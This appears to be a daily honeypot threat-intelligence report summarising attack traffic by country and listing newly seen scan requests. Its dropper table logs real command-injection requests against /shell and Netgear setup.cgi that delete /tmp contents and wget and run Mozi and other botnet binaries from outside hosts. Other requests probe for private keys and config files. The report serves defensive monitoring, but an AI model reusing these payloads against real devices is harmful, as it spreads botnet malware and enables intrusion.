Skip to main content
  1. Daily-Posts/

Report: 2025-04-27

·571 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-27
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 56 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2477 requests were recorded during the day, originating from 5 different countries, with a peak of 458 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
PTAustralia
USDubai
FRIsrael
NLIsrael

botnet_dropper_behaviour
#

remote_addrrequest
121.228.21.17GET /shell?cd+/tmp;rm+-rf+*;wget+http://121.228.21.17:57716/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
190.72.152.73GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1
8.152.208.190GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.90.162.234/wdjkalwww/telnet.arm5;chmod+777+/tmp/telnet.arm5;sh+/tmp/telnet.arm5 HTTP/1.1
139.5.1.142GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.5.1.142:53881/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
122.97.138.184GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.98.81.132:45030/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
706GET /login.asp HTTP/1.1
1463GET /configure.php~ HTTP/1.1
1473GET /config/jwt/private.pem HTTP/1.1
1493GET /database.ini HTTP/1.1
1513GET /bower.json HTTP/1.1
1523GET /apache.conf HTTP/1.1
1593GET /admin/serverConfig.json HTTP/1.1
1643GET /appsettings.xml HTTP/1.1
1733GET /rIwQOU0mwVttxBbF/serverConfig.json HTTP/1.1
2202GET /database.xml HTTP/1.1
2641\x00\x0E8]W\x0Ce\xF8\xAA-\xD9\x00\x00\x00\x00\x00
2821POST /api/user/binLookup?time=1745767396272023380 HTTP/1.1
2831GET /api/bin/440393?time=1745767395856538696 HTTP/1.1
2841GET /config/index?time=1745764581169260604 HTTP/1.1
2991\x00\x0E8\xFE\xF1^\xAF\x88m\xF9\xE0\x00\x00\x00\x00\x00
3051GET /..;/env.js HTTP/1.1
3381GET /env.development.js HTTP/1.1
3871\x00\x0E8L9CL6\xB1`A\x00\x00\x00\x00\x00
4561url=setTracerouteCfg
4621\x04\x01\x01\xBB@\xE9\xA1c\x00
4761\x00\x0E8^3\xDE\x19+L{:\x00\x00\x00\x00\x00
4931\x04\x01\x01\xBB@\xE9\xA1cadm:12345\x00
4981GET /config/index?time=1745766962017004553 HTTP/1.1
5001POST /api/user/binLookup?time=1745763370457311070 HTTP/1.1
5011GET /api/bin/440393?time=1745763369983893030 HTTP/1.1
5021GET /config/index?time=1745762107314057023 HTTP/1.1
5151POST /api/user/binLookup?time=1745770120677017682 HTTP/1.1
5161GET /api/bin/440393?time=1745770120177632729 HTTP/1.1
5331POST /api/user/binLookup?time=1745776793687853170 HTTP/1.1
5341GET /api/bin/440393?time=1745776793202223550 HTTP/1.1
5381GET /config/index?time=1745775665016057494 HTTP/1.1
5441\x00\x0E8\xDBT7s\x1DY\x9C\xAA\x00\x00\x00\x00\x00
5471POST /api/user/binLookup?time=1745782630312845582 HTTP/1.1
5481GET /api/bin/440393?time=1745782629806604696 HTTP/1.1
5621GET /socket.io/1/?t=1745731793995 HTTP/1.1
5741GET /api/bin/440393?time=1745775602295103103 HTTP/1.1
5751GET /config/index?time=1745774907256770641 HTTP/1.1
5761GET /api/bin/440393?time=1745766740613383475 HTTP/1.1
5771GET /config/index?time=1745764229224196044 HTTP/1.1
5781POST /api/user/binLookup?time=1745762238046094137 HTTP/1.1
5791GET /api/bin/440393?time=1745762237553281303 HTTP/1.1
5801GET /config/index?time=1745761443709323513 HTTP/1.1
5991GET /socket.io/1/?t=1745779962937 HTTP/1.1
6001POST /api/user/binLookup?time=1745779244446451172 HTTP/1.1
6011GET /api/bin/440393?time=1745779244053169351 HTTP/1.1
6041GET /config/index?time=1745776644158141012 HTTP/1.1
6051POST /api/user/binLookup?time=1745775602792853846 HTTP/1.1
6101POST /api/user/binLookup?time=1745779899403829020 HTTP/1.1
6111GET /api/bin/440393?time=1745779898993840799 HTTP/1.1
6161GET /config/index?time=1745776995252646216 HTTP/1.1
6171POST /api/user/binLookup?time=1745776966570666717 HTTP/1.1
6181GET /api/bin/440393?time=1745776966136254599 HTTP/1.1
6191GET /config/index?time=1745775370097791449 HTTP/1.1
6261POST /api/user/binLookup?time=1745763636136986641 HTTP/1.1
6271GET /api/bin/440393?time=1745763635726285359 HTTP/1.1
6281GET /config/index?time=1745762029633446743 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0458NL
1404GB
2397US
3233DE
4186SC
5123BG
6101RU
799PL
862VN
953BE
1051HK
1142PT
1237FR
1332IN
1427LT
1520UA
1619CH
1718JP
1816CN
1913CA
2013AU
2111GH
228VE
236SG
245KR
255TR
264IL
274IR
284AO
293MC
303IT
313ES
322ID
332TH
342BD
352ZA
362BR
372RO
382AZ
391PA
401CL
411HU

Related

Report: 2025-04-26
·589 words
Repport Daily
Report: 2025-04-25
·529 words
Repport Daily
Report: 2025-04-24
·358 words
Repport Daily